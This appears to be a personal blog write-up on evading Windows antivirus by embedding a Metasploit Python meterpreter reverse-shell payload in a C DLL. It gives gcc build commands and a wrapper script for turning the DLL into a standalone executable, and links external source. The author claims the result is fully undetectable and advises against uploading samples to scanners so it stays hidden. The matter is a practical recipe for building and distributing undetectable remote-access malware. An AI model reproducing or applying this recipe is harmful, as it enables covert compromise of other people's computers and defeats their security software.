Hello readers !
These days I was interested about AV evasion and I learned so much about how antivirus software work and here I will write about my technique to evade every AV product .
Many People using Windows think that an Antivirus can stop any Threat and with a AV installed their computer will be secured . This idea is false because advanced Malwares are created everyday without be detected by any Antivirus .
How An Antivirus work ?
An AV has two scanning technique :
– Static analysis also called ‘signature-based analysis’ : The Antivirus product compare the md5/sha1 signature of potential threat with the signature of known malware , and if the signature of program scanned matches with those of known malwares then the program is moved to the quarantine of AV .
– Dynamic analysis also called ‘Runtime analysis’ : Once program executed if he’s not detected by signature , The Antivirus will try to detect malicious actions like decrypting payload in memory and plenty others .
An another type of protection is AV sandbox : when a file is suspected by user to be a malware he can be launched in AV sandbox without internet and without some resources an sandbox is like a docker container in linux , the sandbox can run a file without ‘infecting’ the real system .
What you will need to follow this writeup ?
– A main OS with Metasploit framework installed .
– A Windows virtual machine with an Antivirus software installed ( mine is Kaspersky free 2016 ) and mingw with gcc.exe and Python 2.7 .
In this writeup I will use Metasploit payloads as testing executables to evade AV .
Msfvenom is the payload generator of Metasploit’s framework , payloads generated by msfvenom are standalone and they are quite good for Pentesting but they are detected by most of AV products ( See the results from a Online AV scanner with a simple meterpreter reverse shell payload ) .
My idea about Antivirus evasion
I have tried many techniques to obtain a FUD executable but none of them worked :
– Writting an metasploit payload encoder in ruby to obfucate the malicious code of the Payload . After some research I realised that the utility of an MSF encoder is to escape bad characters like x00 not to evade AV software .
– Generating the payload in a interpreted language format (like .py .vbs .pl ) then compile it to executable .
Finally , I have a great idea : Since Metasploit python meterpreter payloads I wanted to embed the python payload In C program with Python developpement libraries like Python.h then compile it into an Windows Executable . With this technique I got 1/37 with Nodistribute Online scanner .
I wanted a Fully undetectable result so I tried to create an Malicious Dynamic Library with the Python Payload embedded and finally got an Fully Undetectable payload 🙂
We can check exported functions from the Malicious dynamic library I’ve created !
We run the malicious function of the DLL !
And BOOM we got a meterpreter session in our side 🙂 !
How to create a DLL with python payload embedded ?
Here You can get the C source code of DLL https://pastebin.com/Q5ipn81s , To compile the DLL you need Python Developpement Libraries you also need libpython27.a (the static library who embed the python interpreter in the executable ) http://www58.zippyshare.com/v/pzoNUkGd/file.html and move it in C:\Python27\libs\
gcc.exe malicious_dll.c -IC:\Python27\include -LC:\Python27\libs -lpython27 -shared -o payload.dll
-shared = tell to gcc that the output will be an dynamic library
-I = tell to gcc where Python.h is located
-o = the output
-L = tell to gcc where the python interpreter library is located
-l = the name of python interpreter lib (libpython27.a)
We got our malicious dynamic library but the problem is how we can distibute it during an Pentest for example we will need a bat file or an exe to call the malicious dll so how can we distribute the two files ?
To resolve the Problem , I created a Python Program who will hardcode the bytes of the dll in a character variable then write them in a new dll then call the function of dll , so the payload will be standalone : https://github.com/Hadi999/MyTools/blob/master/bypass-av.py !
In our case we need to call the function ‘payload’ of payload.dll so the command will be
python bypass-av.py --library=payload.dll --function=payload --output=standalone_payload.c
we compile it in our Windows machine :
gcc.exe standalone_payload.c -o standalone_payload.exe
Arghhh 1/38 for our standalone executable , but the only AV who detect it is Clamav who is an Unix Antivirus : our payload is for Windows so our Executable is Fully Undetectable !!! If you want an 0/37 you can distribute only the malicious dll and a batch file who call it . Its the end of the article I hope you liked it 🙂
Note: Please do not scan the samples with Online Scanner like Virustotal because they share results to AV and our Payload will not be FUD anymore .